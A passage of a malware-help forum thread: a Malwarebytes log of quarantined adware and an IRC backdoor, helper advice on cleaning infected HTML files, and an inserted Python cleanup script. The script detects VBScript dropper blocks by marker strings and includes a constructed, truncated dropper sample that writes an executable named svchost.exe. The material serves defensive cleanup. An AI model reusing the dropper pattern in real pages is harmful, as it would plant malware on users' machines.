Rootkit Database: v2014.08.04.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7
CPU: x86
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 423046
Time Elapsed: 9 min, 34 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 11
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\CLSID\{9BB812EA-6A11-4F94-AE32-DB3FD45EC496}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{66B51873-B53D-42EC-BC1A-862EB4DB041D}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{D01C1E11-ED7A-4791-8408-E63EECDA48FF}, Quarantined, [98b510b53546072f1261dac9b64c8d73], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{5C6B193D-C4D0-4A0C-8509-8EA566380A7C}, Quarantined, [4ffe21a473081d19beb74c571ce69c64], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TypeLib\{BDB0F124-48E8-43A5-A263-45A7093CF058}, Quarantined, [3a1361648eed3ff793e2178ce2205fa1], 
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\RichMediaViewV1release335, Quarantined, [7dd03b8a4d2eff3779bacb20c43e34cc], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\kbanbanalocifhgjcppngcdgminjckhm, Quarantined, [e06d903599e25cda26f720c05fa359a7], 
PUP.Optional.uTorrentTB.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pacgpkgadgmibnhpdidcnfafllnmeomc, Quarantined, [84c96e5736458ea832813db659a9a35d], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER, Quarantined, [47066d5881fabf77d64524bc25dd35cb], 
PUP.Optional.PlusHD.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\HD-V1.9, Quarantined, [a3aa4f760e6d69cd3283905501019868], 
PUP.Optional.SavePass.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\SavePass, Quarantined, [0e3fa322067538fe57f8e10d19e9b14f], 
 
Registry Values: 10
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@zipenhancer.com, C:\Program Files\AmiExt\ZipEnhancer\ff, Quarantined, [66e7873ea0db142228f431afaa5812ee]
PUP.Optional.WebExpEnhanced.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@WebexpEnhancedV1alpha26.net, C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff, Quarantined, [4706992c87f462d4e8feba47f80bcd33]
PUP.Optional.VideoPlayer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@VideoPlayerV3beta10835.net, C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff, Quarantined, [f954e2e34c2f181e54171ddbcc361ee2]
PUP.Optional.MediaPlayerAlpha.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaPlayerV1alpha583.net, C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff, Quarantined, [9bb2299c4a312610d66a8a78f112768a]
PUP.Optional.MediaViewer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewerV1alpha442.net, C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff, Quarantined, [bd908045ef8c57dfe2c65ca155adf907]
PUP.Optional.MediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewV1alpha678.net, C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff, Quarantined, [72dbd9ec512a7fb728d31be12ad827d9]
PUP.Optional.MediaWatch.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaWatchV1home1288.net, C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff, Quarantined, [76d7269fd7a4b3837eb7e1548084bf41]
PUP.Optional.MediaBuzz.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaBuzzV1mode6898.net, C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff, Quarantined, [fe4f9c2981fa79bda86f33be8b77cc34]
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@RichMediaViewV1release335.net, C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff, Quarantined, [d37accf9562589ad023028c38181ff01]
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER|Path, C:\Program Files\AmiExt\ZipEnhancer, Quarantined, [47066d5881fabf77d64524bc25dd35cb]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 14
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config, Quarantined, [9eaff6cf2457ee482b9919c4857d22de], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
 
Files: 114
PUP.Optional.Bandoo, C:\Users\User\Downloads\iLividSetup-r362-n-bc.exe, Quarantined, [e568982d0279e74f0e4a4cc8738e4eb2], 
PUP.Optional.Amonetize, C:\Users\User\AppData\Local\1682\a19451.exe, Quarantined, [004d20a5abd0ac8aa8ef455c5aa7837d], 
Backdoor.IRCBot, C:\Users\User\AppData\Local\1682\a19451mgr.exe, Quarantined, [3b1208bdabd04aec81a89985e71a41bf], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\ver.xml, Quarantined, [9eaff6cf2457ee482b9919c4857d22de], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage, Quarantined, [0449e5e0ea915fd7b2ca30bf13ef03fd], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage-journal, Quarantined, [64e9f4d1780380b6b2ca07e85da519e7], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome.manifest, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\install.rdf, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\3a198c50364e5de2a7b2256a2a71b8a2.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\4560a041a18e5c805686aca2fbbf7fac.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\aa62f988d870591179a338ca156cdc15.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\background.html, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\browser.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\d3f3b4ca28206b48d6a5676ba7ba0c10.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\dialog.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ef029b9a7e24e1a38853d7e5cf38c43b.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\fa2c47838609abcf29f7cdc8d7b8564c.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ffCoreFilesIndex.txt, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\search_dialog.xul, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\775b907e74651ad97a762623558b5cab.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\0c35837f9a11ea63529cc80cee467197.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\11fe0e663f6fb46289354ddc3fbefbd0.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\219bf4e6abfc1d5d6225552064590680.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\24e8e8f96bde5769fc6fca85d218a808.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\277c5ae40aecc6034a98d083cd558fc2.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\379326b295af3787ab8dfc2f0d5ee7c8.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4423f19478213ffdfb956f0806330e92.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4d9663a851b96485807749e976f70ef5.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\8c5f775b0beefb8ee4bf49ac7c7f742c.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\9765f2fc44bc0ea593d57f48c482d053.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\b81ef4f7ddb1fae1efda5bb85912ba27.js, Quarantined, [9cb1f8cdbebd1d19112cc80b8979669a], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

Edited by jsutbee, 11 August 2014 - 12:43 AM.


#12 xXToffeeXx

    Bleepin' Polar Bear

  • Malware Response Instructor
  • 6,079 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 11 August 2014 - 02:20 PM

Hi jsutbee,

 

Hmm, that is a lot. The only way to clean these files is really to open them up in Notepad or similar and remove the infected part (I suggest turning off AVG whilst doing so, as it may try to delete the files); make sure not to run the files. .php and .py files will be unaffected by the virus.

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~
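The manual cleanup xXToffeeXx describes, written up as an added Python example that is not from this thread or any of its posters: it walks a folder of .html/.htm files and strips only VBScript blocks that carry the three marker strings visible in the first post (DropFileName, WriteData, Scripting.FileSystemObject), leaving every other script untouched. It assumes the appended block closes with </SCRIPT>, which the first post does not show, and the sample page below is constructed with a truncated hex payload.

```python
import re
from pathlib import Path

# Strings present in the block pasted in the first post; all three must
# appear before a script block is treated as the dropper.
INJECT_MARKERS = ("DropFileName", "WriteData", "Scripting.FileSystemObject")

# One <SCRIPT Language=VBScript> ... </SCRIPT> block, HTML-comment wrapper included.
# Assumption: the appended block closes with </SCRIPT> (not shown in the post).
SCRIPT_BLOCK = re.compile(
    r'<script\s+language\s*=\s*"?vbscript"?\s*>.*?</script>',
    re.IGNORECASE | re.DOTALL,
)


def is_injected(block: str) -> bool:
    """True only when every marker is present, so ordinary VBScript survives."""
    return all(marker in block for marker in INJECT_MARKERS)


def clean_html(text: str) -> tuple[str, int]:
    """Return (cleaned_text, blocks_removed); unchanged text when nothing matched."""
    removed = 0

    def drop_if_injected(match: re.Match) -> str:
        nonlocal removed
        if is_injected(match.group(0)):
            removed += 1
            return ""
        return match.group(0)

    cleaned = SCRIPT_BLOCK.sub(drop_if_injected, text)
    if removed == 0:
        return text, 0
    return cleaned.rstrip() + "\n", removed


def clean_tree(root: str, exts=(".html", ".htm")) -> list[str]:
    """Clean every page under root in place; return the paths that were rewritten."""
    changed = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        # latin-1 round-trips arbitrary bytes unchanged, whatever the real encoding.
        text = path.read_bytes().decode("latin-1")
        cleaned, removed = clean_html(text)
        if removed:
            path.write_bytes(cleaned.encode("latin-1"))
            changed.append(str(path))
    return changed


# Constructed sample: a benign page plus an appended block shaped like the one
# in the first post (hex payload truncated to a few bytes of the MZ header).
SAMPLE_CLEAN = (
    "<html><head><title>page</title>\n"
    '<script type="text/javascript">console.log("ok");</script>\n'
    "</head><body><p>hello</p></body></html>\n"
)
SAMPLE_INFECTED = SAMPLE_CLEAN + (
    "<SCRIPT Language=VBScript><!--\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A90000300000004000000FFFF0000"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    "--></SCRIPT>\n"
)
```

Run `clean_tree(r"C:\path\to\site")` with the antivirus paused, as the post suggests, and never open the pages in a browser before they are cleaned.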


#13 myrti

    Sillyberry

  • Malware Study Hall Admin
  • 33,771 posts
  • Gender:Female
  • Location:At home

Posted 18 August 2014 - 03:27 PM

Hi,

 

are you still around? Have you found a way to clean the files?

 

regards

myrti


is that a bird?  a plane? nooo it's the flying blueberry!

If I have been helping you and haven't replied in 2 days, feel free to shoot me a PM! Please don't send help request via PM, unless I am already helping you. Use the forums!

 

Follow BleepingComputer on: Facebook | Twitter | Google+


#14 jsutbee

  • Topic Starter
  • Members
  • 21 posts

Posted 18 August 2014 - 11:24 PM

HI myrti,

Thanks for your kind response.

Unfortunately, all my infected html and .dll files were deleted by AVG antivirus. I think there are still a few infected files, and whenever I try to access one, AVG prompts to delete it and I have no option other than to clean/delete it from my system. I recovered lots of html files from my svn server and also re-installed a few programs to locate their dll files. Well, I can use my PC as before, but I have lost lots of files :( .
 



#15 myrti

    Sillyberry

  • Malware Study Hall Admin
  • 33,771 posts
  • Gender:Female
  • Location:At home

Posted 19 August 2014 - 04:20 AM

Hi,

 

there is a chance that AVG only quarantined the files instead of deleting them. Have a look in the virus vault: Open the AVG program and in the History menu, open Virus Vault.

 

However, be careful with restoring the files. Do not restore them to their original position, because they might be executed again and reinfect you. It's better to restore the files to your Desktop or somewhere where you are sure no one will accidentally click and launch them.

 

regards

myrti





